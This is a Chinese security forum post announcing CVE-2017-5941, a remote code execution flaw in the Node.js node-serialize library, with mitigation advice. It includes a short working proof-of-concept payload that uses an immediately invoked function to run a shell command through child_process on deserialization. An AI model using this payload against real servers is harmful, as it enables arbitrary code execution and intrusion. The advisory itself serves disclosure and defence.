打印 上一主题 下一主题

[漏洞预警] Node.js反序列化远程代码执行漏洞通告CVE-2017-5941

[复制链接]

33

主题

55

帖子

335

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
335
跳转到指定楼层
楼主
3208 0 rodster 发表于 2017-2-10 21:05:12
漏洞编号:CVE-2017-5941

漏洞描述:
Node.js存在反序列化远程代码执行漏洞,Node.js的node-serialize库中存在一个漏洞,该漏洞通过传输JavaScript IIFE,利用恶意代码(未信任数据)达到反序列化远程任意代码执行的效果。并且Nodejs服务端必须存在接收序列化的数据接口。

漏洞类型: 反序列化远程代码执行漏洞
危险等级: 高级
利用条件: 系统存在Node.js,并且存在node-serialize库
受影响系统: 暂无补丁,Node.js全版本受影响



漏洞利用(POC)
  1. var serialize = require('node-serialize');
  2. var payload = '{"rce":"_$ND_FUNC$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
  3. serialize.unserialize(payload);
复制代码

修复建议:

厂商尚未提供漏洞修补方案,请关注厂商主页及时更新:https://github.com/luin/serialize

临时解决方案:
1. 修改/node_modules/node-serialize/lib/serialize.js中的FUNCFLAG值为随机值并保证该值不被泄漏。
2. 确保Serialize字符串仅内部发送
3. 使用公钥(RAS)加密Serialize字符串,确保字符串不被篡改。


参考链接
1. https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
2. https://github.com/luin/serialize

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1、本版为漏洞预警板块,禁止发和漏洞无关的帖子。
2、本站所有资源,可用于网站安全检测,不得使用非法,使用非法与本站无关
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和云夕阁论坛的同意
4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、如本版块文章侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
6、云夕阁论坛管理员和版主有权不事先通知发贴者而删除本文
  • 今日
    0
  • 主题
    6

推荐阅读

Archiver|手机版|小黑屋| 云夕阁 ( 湘ICP备16017785号-2 )     

返回顶部 返回列表